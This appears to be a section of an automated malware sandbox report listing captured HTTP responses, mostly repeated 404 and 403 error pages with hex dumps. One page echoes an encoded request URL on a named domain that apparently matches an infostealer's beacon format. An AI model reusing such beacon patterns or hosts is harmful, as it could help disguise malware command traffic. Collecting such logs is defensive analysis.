        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Wed, 22 May 2024 15:33:58 GMTContent-Type: text/htmlContent-Length: 197Connection: closeAccept-Ranges: bytesVary: Accept-Encoding,User-AgentContent-Encoding: gzipData Raw: 1f 8b 08 00 00 00 00 00 00 03 e5 8e cd 0e 82 30 10 84 ef 7d 8a 95 bb ac 1a e3 a9 69 22 b4 84 26 a8 84 d4 83 47 7f d6 60 8c 54 29 ca eb db c2 c5 77 70 6f b3 fb ed cc f0 89 dc a5 e6 50 2a c8 cd a6 80 72 9f 14 3a 85 68 8a a8 95 c9 10 a5 91 e3 65 11 cf 10 d5 36 12 8c 07 2d 78 ae d6 d2 0b a3 4d a1 c4 72 b6 84 ad ed 20 b3 ef e6 c2 71 5c 32 8e 03 c4 93 9d 3c 84 bf b9 f8 61 bc 62 a6 26 68 e9 f5 26 d7 d1 05 f6 55 01 68 9f ab 0e a1 3f 3a 68 3c 7b 0d 2c d8 06 ba fa e6 c0 51 fb a1 36 f6 4e 95 b7 d3 a2 ef fb f8 44 d4 3a ba 93 8b cf f6 c1 51 87 d4 21 cf 27 84 9e ec 9f e7 0b e9 3b f3 94 de 01 00 00 Data Ascii: 0}i"&G`T)wpoP*r:he6-xMr q\2<ab&h&Uh?:h<{,Q6ND:Q!';
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Wed, 22 May 2024 15:34:01 GMTContent-Type: text/htmlContent-Length: 197Connection: closeAccept-Ranges: bytesVary: Accept-Encoding,User-AgentContent-Encoding: gzipData Raw: 1f 8b 08 00 00 00 00 00 00 03 e5 8e cd 0e 82 30 10 84 ef 7d 8a 95 bb ac 1a e3 a9 69 22 b4 84 26 a8 84 d4 83 47 7f d6 60 8c 54 29 ca eb db c2 c5 77 70 6f b3 fb ed cc f0 89 dc a5 e6 50 2a c8 cd a6 80 72 9f 14 3a 85 68 8a a8 95 c9 10 a5 91 e3 65 11 cf 10 d5 36 12 8c 07 2d 78 ae d6 d2 0b a3 4d a1 c4 72 b6 84 ad ed 20 b3 ef e6 c2 71 5c 32 8e 03 c4 93 9d 3c 84 bf b9 f8 61 bc 62 a6 26 68 e9 f5 26 d7 d1 05 f6 55 01 68 9f ab 0e a1 3f 3a 68 3c 7b 0d 2c d8 06 ba fa e6 c0 51 fb a1 36 f6 4e 95 b7 d3 a2 ef fb f8 44 d4 3a ba 93 8b cf f6 c1 51 87 d4 21 cf 27 84 9e ec 9f e7 0b e9 3b f3 94 de 01 00 00 Data Ascii: 0}i"&G`T)wpoP*r:he6-xMr q\2<ab&h&Uh?:h<{,Q6ND:Q!';
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Wed, 22 May 2024 15:34:04 GMTContent-Type: text/htmlContent-Length: 197Connection: closeAccept-Ranges: bytesVary: Accept-Encoding,User-AgentContent-Encoding: gzipData Raw: 1f 8b 08 00 00 00 00 00 00 03 e5 8e cd 0e 82 30 10 84 ef 7d 8a 95 bb ac 1a e3 a9 69 22 b4 84 26 a8 84 d4 83 47 7f d6 60 8c 54 29 ca eb db c2 c5 77 70 6f b3 fb ed cc f0 89 dc a5 e6 50 2a c8 cd a6 80 72 9f 14 3a 85 68 8a a8 95 c9 10 a5 91 e3 65 11 cf 10 d5 36 12 8c 07 2d 78 ae d6 d2 0b a3 4d a1 c4 72 b6 84 ad ed 20 b3 ef e6 c2 71 5c 32 8e 03 c4 93 9d 3c 84 bf b9 f8 61 bc 62 a6 26 68 e9 f5 26 d7 d1 05 f6 55 01 68 9f ab 0e a1 3f 3a 68 3c 7b 0d 2c d8 06 ba fa e6 c0 51 fb a1 36 f6 4e 95 b7 d3 a2 ef fb f8 44 d4 3a ba 93 8b cf f6 c1 51 87 d4 21 cf 27 84 9e ec 9f e7 0b e9 3b f3 94 de 01 00 00 Data Ascii: 0}i"&G`T)wpoP*r:he6-xMr q\2<ab&h&Uh?:h<{,Q6ND:Q!';
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Wed, 22 May 2024 15:34:07 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeVary: Accept-EncodingAccept-Ranges: bytesVary: Accept-Encoding,User-AgentData Raw: 32 36 61 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 0a 3c 54 49 54 4c 45 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 48 31 3e 0a 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 6f 70 36 74 2f 3f 78 32 3d 77 4e 32 78 59 26 61 6d 70 3b 6e 76 64 64 67 3d 59 63 74 58 67 77 53 63 33 42 46 48 33 36 79 46 39 79 73 33 64 6b 67 63 4e 4d 7a 4f 44 64 4d 41 67 35 55 72 4b 34 68 6f 4f 43 74 6b 55 38 65 75 36 6a 4a 74 67 4b 53 2b 37 39 56 6f 6f 6b 58 32 36 6b 62 71 37 6a 42 37 62 78 31 74 36 69 63 54 53 76 4e 48 68 6d 39 61 75 4b 39 4f 33 52 46 54 59 6c 4b 31 39 57 4f 36 50 52 36 56 31 52 50 76 4b 70 31 75 6c 6e 34 3d 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 0a 3c 48 52 3e 0a 3c 49 3e 77 77 77 2e 62 65 65 72 73 65 6b 65 73 2e 63 6f 6d 3c 2f 49 3e 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0d 0a Data Ascii: 26a<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><HTML><HEAD><TITLE>404 Not Found</TITLE></HEAD><BODY><H1>Not Found</H1>The requested URL /op6t/?x2=wN2xY&amp;nvddg=YctXgwSc3BFH36yF9ys3dkgcNMzODdMAg5UrK4hoOCtkU8eu6jJtgKS+79VookX26kbq7jB7bx1t6icTSvNHhm9auK9O3RFTYlK19WO6PR6V1RPvKp1uln4= was not found on this server.<HR><I>www.beersekes.com</I></BODY></HTML>
        Source: global trafficHTTP traffic detected: HTTP/1.1 403 Forbiddencontent-length: 93cache-control: no-cachecontent-type: text/htmlconnection: closeData Raw: 3c 68 74 6d 6c 3e 3c 62 6f 64 79 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 52 65 71 75 65 73 74 20 66 6f 72 62 69 64 64 65 6e 20 62 79 20 61 64 6d 69 6e 69 73 74 72 61 74 69 76 65 20 72 75 6c 65 73 2e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <html><body><h1>403 Forbidden</h1>Request forbidden by administrative rules.</body></html>
        Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenContent-Length: 548Content-Type: text/htmlServer: PepyakaX-Wix-Request-Id: 1716392102.1269038556672615301X-Content-Type-Options: nosniffAccept-Ranges: bytesDate: Wed, 22 May 2024 15:35:02 GMTX-Served-By: cache-bfi-krnt7300112-BFIX-Cache: MISSX-Seen-By: yvSunuo/8ld62ehjr5B7kA==,xIKq3IotbbLp4+7DTTMx8R9slopJdhD+WySraMrpIY8=,m0j2EEknGIVUW/liY8BLLkPYl3Dc4B5QnXwwDz84vBQG/hKs8AeY1T4OIbgnD+yxVia: 1.1 googleglb-x-seen-by: bS8wRlGzu0Hc+WrYuHB8QIg44yfcdCMJRkBoQ1h6Vjc=Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
        Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenContent-Length: 548Content-Type: text/htmlServer: PepyakaX-Wix-Request-Id: 1716392104.8279035854453713443X-Content-Type-Options: nosniffAccept-Ranges: bytesDate: Wed, 22 May 2024 15:35:04 GMTX-Served-By: cache-bfi-krnt7300093-BFIX-Cache: MISSX-Seen-By: yvSunuo/8ld62ehjr5B7kA==,xIKq3IotbbLp4+7DTTMx8R9slopJdhD+WySraMrpIY8=,m0j2EEknGIVUW/liY8BLLjYvXQYrV/LrhbkNY01ADWAG/hKs8AeY1T4OIbgnD+yxVia: 1.1 googleglb-x-seen-by: bS8wRlGzu0Hc+WrYuHB8QIg44yfcdCMJRkBoQ1h6Vjc=Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
        Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenContent-Length: 548Content-Type: text/htmlServer: PepyakaX-Wix-Request-Id: 1716392107.534903909656384024X-Content-Type-Options: nosniffAccept-Ranges: bytesDate: Wed, 22 May 2024 15:35:07 GMTX-Served-By: cache-bfi-krnt7300097-BFIX-Cache: MISSX-Seen-By: yvSunuo/8ld62ehjr5B7kA==,T7xPrjRFKDMHVv938PYVfx9slopJdhD+WySraMrpIY8=,m0j2EEknGIVUW/liY8BLLuuWLGLAwvTMYA8ArAuxUdgm++C2XkuTvnlRFg2XiSDLVia: 1.1 googleglb-x-seen-by: bS8wRlGzu0Hc+WrYuHB8QIg44yfcdCMJRkBoQ1h6Vjc=Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 22 May 2024 15:36:08 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 22 May 2024 15:36:11 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 22 May 2024 15:36:14 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 22 May 2024 15:36:17 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/html; charset=utf-8Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
